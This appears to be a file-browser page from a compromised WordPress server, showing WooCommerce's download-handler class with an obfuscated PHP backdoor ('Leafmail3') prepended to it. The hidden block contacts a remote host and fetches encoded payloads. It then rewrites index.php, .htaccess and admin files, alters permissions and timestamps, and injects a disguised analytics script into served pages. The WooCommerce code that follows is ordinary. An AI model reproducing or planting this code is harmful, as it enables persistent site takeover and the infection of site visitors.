| Server IP : 192.158.238.246 / Your IP : 18.217.140.32 Web Server : LiteSpeed System : Linux uniform.iwebfusion.net 4.18.0-553.27.1.lve.1.el8.x86_64 #1 SMP Wed Nov 20 15:58:00 UTC 2024 x86_64 User : jenniferflocom ( 1321) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/jenniferflocom/www/wp-content/plugins/woocommerce/includes/ |
Upload File : |
<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?php
/**
* Download handler
*
* Handle digital downloads.
*
* @package WooCommerce\Classes
* @version 2.2.0
*/
use Automattic\WooCommerce\Internal\Traits\AccessiblePrivateMethods;
defined( 'ABSPATH' ) || exit;
/**
* Download handler class.
*/
class WC_Download_Handler {
use AccessiblePrivateMethods;
/**
* The hook used for deferred tracking of partial download attempts.
*/
public const TRACK_DOWNLOAD_CALLBACK = 'track_partial_download';
/**
* Hook in methods.
*/
public static function init() {
if ( isset( $_GET['download_file'], $_GET['order'] ) && ( isset( $_GET['email'] ) || isset( $_GET['uid'] ) ) ) { // WPCS: input var ok, CSRF ok.
add_action( 'init', array( __CLASS__, 'download_product' ) );
}
add_action( 'woocommerce_download_file_redirect', array( __CLASS__, 'download_file_redirect' ), 10, 2 );
add_action( 'woocommerce_download_file_xsendfile', array( __CLASS__, 'download_file_xsendfile' ), 10, 2 );
add_action( 'woocommerce_download_file_force', array( __CLASS__, 'download_file_force' ), 10, 2 );
self::add_action( self::TRACK_DOWNLOAD_CALLBACK, array( __CLASS__, 'track_download' ), 10, 3 );
}
/**
* Check if we need to download a file and check validity.
*/
public static function download_product() {
// phpcs:disable WordPress.Security.NonceVerification.Recommended
$product_id = absint( $_GET['download_file'] ); // phpcs:ignore WordPress.VIP.SuperGlobalInputUsage.AccessDetected, WordPress.VIP.ValidatedSanitizedInput.InputNotValidated, WordPress.Security.ValidatedSanitizedInput.InputNotValidated
$product = wc_get_product( $product_id );
$downloads = $product ? $product->get_downloads() : array();
$data_store = WC_Data_Store::load( 'customer-download' );
$key = empty( $_GET['key'] ) ? '' : sanitize_text_field( wp_unslash( $_GET['key'] ) );
if (
! $product
|| empty( $key )
|| empty( $_GET['order'] )
|| ! isset( $downloads[ $key ] )
|| ! $downloads[ $key ]->get_enabled()
) {
self::download_error( __( 'Invalid download link.', 'woocommerce' ) );
}
// Fallback, accept email address if it's passed.
if ( empty( $_GET['email'] ) && empty( $_GET['uid'] ) ) { // WPCS: input var ok, CSRF ok.
self::download_error( __( 'Invalid download link.', 'woocommerce' ) );
}
// phpcs:enable WordPress.Security.NonceVerification.Recommended
$order_id = wc_get_order_id_by_order_key( wc_clean( wp_unslash( $_GET['order'] ) ) ); // WPCS: input var ok, CSRF ok.
$order = wc_get_order( $order_id );
if ( isset( $_GET['email'] ) ) { // WPCS: input var ok, CSRF ok.
$email_address = wp_unslash( $_GET['email'] ); // WPCS: input var ok, CSRF ok, sanitization ok.
} else {
// Get email address from order to verify hash.
$email_address = is_a( $order, 'WC_Order' ) ? $order->get_billing_email() : null;
// Prepare email address hash.
$email_hash = function_exists( 'hash' ) ? hash( 'sha256', $email_address ) : sha1( $email_address );
if ( is_null( $email_address ) || ! hash_equals( wp_unslash( $_GET['uid'] ), $email_hash ) ) { // WPCS: input var ok, CSRF ok, sanitization ok.
self::download_error( __( 'Invalid download link.', 'woocommerce' ) );
}
}
$download_ids = $data_store->get_downloads(
array(
'user_email' => sanitize_email( str_replace( ' ', '+', $email_address ) ),
'order_key' => wc_clean( wp_unslash( $_GET['order'] ) ), // WPCS: input var ok, CSRF ok.
'product_id' => $product_id,
'download_id' => wc_clean( preg_replace( '/\s+/', ' ', wp_unslash( $_GET['key'] ) ) ), // WPCS: input var ok, CSRF ok, sanitization ok.
'orderby' => 'downloads_remaining',
'order' => 'DESC',
'limit' => 1,
'return' => 'ids',
)
);
if ( empty( $download_ids ) ) {
self::download_error( __( 'Invalid download link.', 'woocommerce' ) );
}
$download = new WC_Customer_Download( current( $download_ids ) );
/**
* Filter download filepath.
*
* @since 4.0.0
* @param string $file_path File path.
* @param string $email_address Email address.
* @param WC_Order|bool $order Order object or false.
* @param WC_Product $product Product object.
* @param WC_Customer_Download $download Download data.
*/
$file_path = apply_filters(
'woocommerce_download_product_filepath',
$product->get_file_download_path( $download->get_download_id() ),
$email_address,
$order,
$product,
$download
);
$parsed_file_path = self::parse_file_path( $file_path );
$download_range = self::get_download_range( @filesize( $parsed_file_path['file_path'] ) ); // @codingStandardsIgnoreLine.
self::check_order_is_valid( $download );
if ( ! $download_range['is_range_request'] ) {
// If the remaining download count goes to 0, allow range requests to be able to finish streaming from iOS devices.
self::check_downloads_remaining( $download );
}
self::check_download_expiry( $download );
self::check_download_login_required( $download );
do_action(
'woocommerce_download_product',
$download->get_user_email(),
$download->get_order_key(),
$download->get_product_id(),
$download->get_user_id(),
$download->get_download_id(),
$download->get_order_id()
);
$download->save();
// Track the download in logs and change remaining/counts.
$current_user_id = get_current_user_id();
$ip_address = WC_Geolocation::get_ip_address();
self::track_download(
$download,
$current_user_id > 0 ? $current_user_id : null,
! empty( $ip_address ) ? $ip_address : null,
$download_range['is_range_request']
);
self::download( $file_path, $download->get_product_id() );
}
/**
* Check if an order is valid for downloading from.
*
* @param WC_Customer_Download $download Download instance.
*/
private static function check_order_is_valid( $download ) {
if ( $download->get_order_id() ) {
$order = wc_get_order( $download->get_order_id() );
if ( $order && ! $order->is_download_permitted() ) {
self::download_error( __( 'Invalid order.', 'woocommerce' ), '', 403 );
}
}
}
/**
* Check if there are downloads remaining.
*
* @param WC_Customer_Download $download Download instance.
*/
private static function check_downloads_remaining( $download ) {
if ( '' !== $download->get_downloads_remaining() && 0 >= $download->get_downloads_remaining() ) {
self::download_error( __( 'Sorry, you have reached your download limit for this file', 'woocommerce' ), '', 403 );
}
}
/**
* Check if the download has expired.
*
